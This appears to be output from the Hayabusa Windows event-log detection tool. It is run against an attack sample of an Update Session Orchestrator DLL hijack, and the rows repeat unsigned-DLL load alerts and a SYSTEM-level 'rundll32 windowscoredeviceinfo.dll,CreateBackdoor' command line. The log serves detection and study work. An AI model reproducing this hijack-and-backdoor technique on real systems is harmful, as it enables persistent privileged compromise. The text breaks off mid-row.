SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
